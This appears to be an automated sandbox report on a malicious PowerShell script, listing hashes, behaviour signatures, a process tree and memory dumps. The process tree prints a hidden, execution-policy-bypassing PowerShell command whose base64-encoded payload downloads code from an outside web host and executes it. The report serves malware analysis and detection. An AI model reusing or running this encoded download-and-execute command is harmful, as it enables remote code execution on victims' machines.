d58dc2ab26df5783442b79e3edb7826599494b28f3c75fa3823cbc876f3707da

General

Target

4bd/work.ps1
Size

1.4MB
MD5

7ba4b5c5d3e3276a3cfe8d581cf7173b
SHA1

79ba87b46562e75f097c1b6d23d3b63b9160bbaa
SHA256

73737bf28fa00ea1380bf98a76f6c2ff34bf25e8b489750acccc45df8e898022
SHA512

ccccc4402edc1c333f2b11955b4c2850f5b68674e473d57521cb009e2047a46f9c57c0151b9191d4a2e3b10931723d0191bba9b299ffb3bb293ff7d6f83598c6

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

6 408 powershell.exe
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exepowershell.exe

pid process

452 powershell.exe
408 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 452 powershell.exe
Token: SeDebugPrivilege 408 powershell.exe

flow	pid	process
6	408	powershell.exe

pid	process
452	powershell.exe
408	powershell.exe

description	pid	process
Token: SeDebugPrivilege	452	powershell.exe
Token: SeDebugPrivilege	408	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

Processes:

powershell.exe

description	pid	process	target process
PID 452 wrote to memory of 408	452	powershell.exe	powershell.exe
PID 452 wrote to memory of 408	452	powershell.exe	powershell.exe
PID 452 wrote to memory of 408	452	powershell.exe	powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\4bd\work.ps1
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:452
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -enc JABNAD0AWwBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoAQwByAGUAYQB0AGUAKAAnAGgAdAB0AHAAOgAvAC8AYQB0AGgAaQBuAGcAYwBhAGwAbABlAGQAYwBhAGsAZQAuAGMAbwBtAC8AZgBpAGwAZQAnACkAOwAkAHQAPQAkAE0ALgBHAGUAdABSAGUAcwBwAG8AbgBzAGUAKAApADsAJABSAD0AJAB0AC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlAFMAdAByAGUAYQBtACgAKQA7ACQARgA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAgACQAUgA7ACQAcAA9ACQARgAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AGkAZQB4ACgAJABwACkAOwAgAA==
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:408

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

MD5
42623088a3aba1ed4b4c742897e5c77d

SHA1
e06b17ea0879bb680315af8140996409d4ed9451

SHA256
0d52bb0f43afc39b26dce6c7dcd4beae673b730bac06d992f2921d9fa38c47ac

SHA512
4c710d5362932392146e96cc843e8c0be606384fa9d79d23f977912f9ced014da4f85d0abb62a7576c489659fdaed609e8032972a647b558280d4f94c3c7df49

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5
296b396d34e86a9339650fbdcb6be3b6

SHA1
d73af6e09e315eebdd7ac97637437ebeba0b7405

SHA256
7c4e1c34f5178da09241eb926169763e3c77a52a35f9142788cff2e809cbd758

SHA512
3c73a58416a66273d0651016cbde256d6648afd3d0802c108e6c31b00c7edd24215684118dce76e9cdd6f0367db24916c23e54ebf0d5814027a3aec5ef726fd5

Download Submit
memory/408-70-0x0000000000000000-mapping.dmp

Download
memory/408-80-0x000000001C930000-0x000000001C931000-memory.dmp

Filesize
4KB

Download
memory/408-76-0x000000001AA84000-0x000000001AA86000-memory.dmp

Filesize
8KB

Download
memory/408-75-0x000000001AA80000-0x000000001AA82000-memory.dmp

Filesize
8KB

Download
memory/452-64-0x000000001AA30000-0x000000001AA32000-memory.dmp

Filesize
8KB

Download
memory/452-67-0x000000001AA3A000-0x000000001AA59000-memory.dmp

Filesize
124KB

Download
memory/452-68-0x000000001C0A0000-0x000000001C0A1000-memory.dmp

Filesize
4KB

Download
memory/452-69-0x000000001C4B0000-0x000000001C4B1000-memory.dmp

Filesize
4KB

Download
memory/452-66-0x0000000002510000-0x0000000002511000-memory.dmp

Filesize
4KB

Download
memory/452-65-0x000000001AA34000-0x000000001AA36000-memory.dmp

Filesize
8KB

Download
memory/452-60-0x000007FEFBEF1000-0x000007FEFBEF3000-memory.dmp

Filesize
8KB

Download
memory/452-63-0x0000000002770000-0x0000000002771000-memory.dmp

Filesize
4KB

Download
memory/452-62-0x000000001AAB0000-0x000000001AAB1000-memory.dmp

Filesize
4KB

Download
memory/452-61-0x0000000002730000-0x0000000002731000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads